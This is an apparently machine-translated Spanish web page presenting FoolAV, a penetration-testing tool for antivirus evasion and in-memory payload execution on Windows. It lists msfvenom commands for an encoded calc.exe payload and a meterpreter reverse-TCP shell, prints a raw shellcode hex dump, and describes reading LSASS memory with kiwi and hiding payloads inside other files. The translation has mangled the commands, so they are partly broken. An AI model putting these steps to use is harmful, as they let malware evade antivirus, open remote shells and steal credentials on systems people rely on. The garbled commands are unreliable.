FoolAV: herramienta Pentest para la evasión de antivirus y la ejecución de carga útil arbitraria en el host Wintel de destino

FoolAV es una herramienta para la evasión de antivirus y la ejecución de cargas útiles arbitrarias en el host Wintel de destino.

Es útil durante las pruebas de penetración en las que necesita ejecutar una carga útil (¿tal vez meterpreter?), Teniendo la certeza de que su software antivirus no la detectará. El único requisito es poder cargar dos archivos: ejecutable binario Y archivo de carga útil en el mismo directorio.

Índice de contenidos

    Uso:

    1. Prepare su carga útil (x86), p. Ej.

    • calcular: msfvenom -p windows / exec CMD = calc.exe EXITFUNC = hilo -e x86 / shikata_ga_nai -b " x00 x0a x0d xff" -fc 2> / dev / null | egrep "^ " "| tr -d" " n;" > foolav.mf (no necesita usar ningún codificador de caracteres o lista negra, funcionará de todos modos)
    • metro: msfvenom -p windows / meterpreter_reverse_tcp LHOST = ... -a x86 -fc 2> / dev / null | egrep "^ " "| tr -d" " n;" > foolav.mf

    2. Copie el archivo de carga útil [executable-name-without-exe-extension].mf en el mismo directorio que la carga útil ejecutable que ejecuta calc.exe generado con el comando anterior:

    # calc.exe
    xbbx28x30x85x5bxd9xf7xd9x74x24xf4x5ax2bxc9xb1x33x83xeaxfcx31x5ax0ex03x72x3ex67xaex7exd6xeex51x7ex27x91xd8x9bx16x83xbfxe8x0bx13xcbxbcxa7xd8x99x54x33xacx35x5bxf4x1bx60x52x05xaaxacx38xc5xacx50x42x1ax0fx68x8dx6fx4exadxf3x80x02x66x78x32xb3x03x3cx8fxb2xc3x4bxafxccx66x8bx44x67x68xdbxf5xfcx22xc3x7ex5ax93xf2x53xb8xefxbdxd8x0bx9bx3cx09x42x64x0fx75x09x5bxa0x78x53x9bx06x63x26xd7x75x1ex31x2cx04xc4xb4xb1xaex8fx6fx12x4fx43xe9xd1x43x28x7dxbdx47xafx52xb5x73x24x55x1axf2x7ex72xbex5fx24x1bxe7x05x8bx24xf7xe1x74x81x73x03x60xb3xd9x49x77x31x64x34x77x49x67x16x10x78xecxf9x67x85x27xbex88x67xe2xcax20x3ex67x77x2dxc1x5dxbbx48x42x54x43xafx5ax1dx46xebxdcxcdx3ax64x89xf1xe9x85x98x91x6cx16x40x78x0bx9exe3x84
    

    3. Una vez que se ejecuta el ejecutable, el archivo de carga útil se analizará, se cargará en un hilo separado y se ejecutará en la memoria:

    Pantalla FoolAV Calc

    Notas:

    • El binario x86 se ejecutará en sistemas Windows x86 y x86_64. Sin embargo, se deben utilizar las cargas útiles de la arquitectura x86. Sin embargo, la carga útil de meterpreter x86 se puede migrar a procesos x86_64. Después, cargar kiwi cargará la versión x86_64, lo que permitirá acceder a los jugosos contenidos de la memoria del proceso LSASS 🙂
      Pantalla FoolAV Meterpreter
      • El archivo de carga útil .mf se puede ofuscar: el analizador ignorará cualquier carácter que no sea xHH secuencias hexadecimales. Esto significa que puede agregar su carga útil a casi cualquier archivo, ocultarlo entre líneas o incluso agregar sus propios comentarios, por ejemplo:
      Captura de pantalla de FoolAV.mf

      Deja una respuesta

      Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

      Subir